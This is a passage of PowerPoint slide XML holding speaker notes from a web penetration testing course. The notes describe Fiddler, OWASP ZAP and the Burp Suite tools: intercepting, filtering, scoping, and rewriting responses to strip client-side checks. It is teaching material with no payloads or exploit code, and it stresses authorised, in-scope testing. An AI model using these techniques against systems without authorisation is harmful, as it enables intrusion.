              <a:rPr lang="en-US" i="1" baseline="0" dirty="0"/>
              <a:t>inspectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tab.  Sometimes Fiddler will have a message that the response is encoded, but if you click that message, it will decode and display the results.  This is often because the server is sending the response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>gzipped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to increase performance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34661425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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235523" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now we are going to explore the burp suite.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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35</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0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP has long has WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as the main proxy project.  But this project has been dead for a number of years.  Luckily, the Zed Attack Proxy project took over.  It was initially just a new instance of the Paros Proxy from years ago, but has grown into a tool set that rivals even the commercial projects.  It is a Java application that is available at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OWASP_Zed_Attack_Proxy_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>  Of course you can also go to the main page of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>OWASP.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and find it there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>It includes a large number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>featurws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> including an active and passive scanner.  It also has a very capable fuzzer and supports technologies such as WebSockets.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40612851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can see in the screenshot above, the interface is divided into various sections.  The top,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in this view, has a list of the sites and pages visited on the left hand side, which has become standard.  On the right is a series of tabs.  The first is the quick start, which allows us to quickly tell ZAP the target of the test and start the scanning.  We also have the request and response viewers.  The last tab is the Break.  This is an interception tab that will allow the tester to stop a request from reaching the server until they can modify it and submit it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The bottom of the interface is a series of tabs which provides various functionality.  If you double click a tab, it will fill the screen, allowing for easier use.  This is where we can control things such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>spidering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and the active scanning.  We also have the alerts tab.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10100325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select the active scanner, (the passive runs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> all the time) we can select a target in the drop down.  Then click the play button.  ZAP will then start scanning the application to find application flaws.  As it scans, we get a series of log messages letting us know what it is doing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When any of the scans finds a potential issue, or we manually enter one, it goes into the alerts tab.  We are able to see a list of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0"/>
              <a:t>findings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t> with a color based on the severity.  We then can select one to receive a description of the problem and the actual request and response that triggered the alert.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230275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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235523" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now we are going to explore the burp suite.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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39</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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181251"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery is the phase in which we interact with the web application, pushing and prodding to discover weaknesses.  Up to this point we have merely been walking around the store, looking around.  While in the discovery phase, we begin pushing up ceiling tiles, opening doors, sitting in a corner of the store to see if the camera can see us.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As always, make certain that any systems you interact with are within the scope of the engagement, and that you have explicit, written permission for your activities. Our first step is to identify potential vulnerabilities. Remember that all areas of input are interesting.  Hacking is all about attack surface.  What can you manipulate, and how can you leverage it to your benefit?  The only limit we have is our own imagination.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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4</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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236547"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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The burp suite is the next set of tools we will explore.  This powerful suite of tools is available from portswigger.net and has two versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>he free version and a professional version.  The free version lacks a few of the features such as saving and loading the state of the test, an unlimited or throttled version of intruder and a full-featured web scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp suite provides complete access to the HTTP requests and responses which we can use what we learned in PEWAPT101.1 to manipulate the requests.</a:t>
            </a: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40</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Rot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126978" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This list shows the various parts of the Burp Suite.  All of these pieces can be used together or separately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - Intercepts and allows manipulation of HTTP/S connections between attack browser and web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - crawls a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - very flexible attack tool (customizable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - allows manipulation and repeating of interactions/attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Sequencer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - analyzes session tokens for predictability, thus the relative security against session synthesis/hijacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - manual or "intelligent" decoding of various encoding schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Comparer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> - a form of "diff", providing differences between two items of text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-111125">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Comms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> tab is where we can configure a proxy or other settings related to the HTTP communication.  The alerts tab is where any messages from a tool that Burp believes the tester needs to see immediately are displayed.  These messages are things that the tester needs to answer before Burp can continue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="3175"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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41</a:t>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target tab is where you will spend most of your time during mapping.  This tab contains all of the requests the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> proxy sees and allows us to examine all of the requests and responses.  As we look at the screen shot above, we see that the screen is split into three areas.  On the left is a list of all of the web sites seen in the traffic.  The ones in gray were linked too, but the tester never requested them.  On the top of the right side is a list of all of the requests seen in the selected site.  This also contains gray items that were linked too but not visited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Finally the bottom of the right hand side is the currently selected item.  We are able to see both the request and the response here, Burp allows us to choose how we would like to see it, displaying the raw item or other options as relevant to the item.  For example, if it's an HTML page, you are able to select render and see the page as a browser would display it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28949991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of the features that is available on the target tab is the filtering.  This is accessed by clicking on the bar across the top that lists what is being displayed.  The filtering allows us to choose between various options to control what is visible in the window.  Keep in mind that this does not remove the item from Burp's memory, it just controls whether or not we can see it. This is useful as we work in that it limits distractions by only displaying the items we are interested in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When we look at the filtering options, there are a ton of items we can select to use within the filters.  For example, we are able to choose to only show certain status codes or specific mime types.  One point to keep in mind is that the mime type filtering is based on what Burp thinks the mime type should be, not what may be listed in the mime type within the response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Burp does ship with some pretty good defaults for most uses except it hides 400-level status codes.  This prevents us from seeing items that require authorization using a 401 or links that are bad.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3710844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target tab, we have the idea of scope.  Scope is whether or not a page or site is considered within the scope of the test.  Keep in mind that for the most part scope controls the automated features of Burp.  For example, the automated scanner by default will only scan in-scope items.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we mark items in scope, we have a couple options as to how.  First we can right click on something in the target tab and select "Add item to scope".  If we do this, Burp will build the scope entry based on what we have selected.  We can also just add them in the scope window.  As items are listed, the system uses regular expressions to match other items.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33087006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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238595" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="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a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp proxy is very similar to other proxies.  It can be used to intercept requests and responses for us to mangle them or it just records the requests and responses for use with the other tools within the suite.  Burp proxy has a couple other features that are of use to us during our tests.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first is a set of rules for which requests and responses are to be intercepted.  These rules base the decision on items such as the URL or the response code from the server.  This allows us to have better control of what requires a response from us during the test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The second feature of interest is that burp proxy can be configured to automatically rewrite portions of the responses.  These automatic rewrite rules can be set to remove JavaScript filtering or input length limits as two examples.</a:t>
            </a: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45</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the proxy controls so much of Burp, it makes sense that we have a way to control the various options within it.  We are provided a series of options to control how Burp handles the traffic it sees.  For example, we are able to select if Burp is going to intercept responses or requests.  We are also able to create a series of patterns to limit what items are intercepted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Another option we have is to build a series of rules on automatic changes Burp will make to the requests and responses it sees.  This allows us to browse through it and have Burp change things we may need to change without requiring us to intercept each and every request.  For example, Burp has a series of check boxes to perform common actions such as removing JavaScript or changing the visibility of hidden form fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
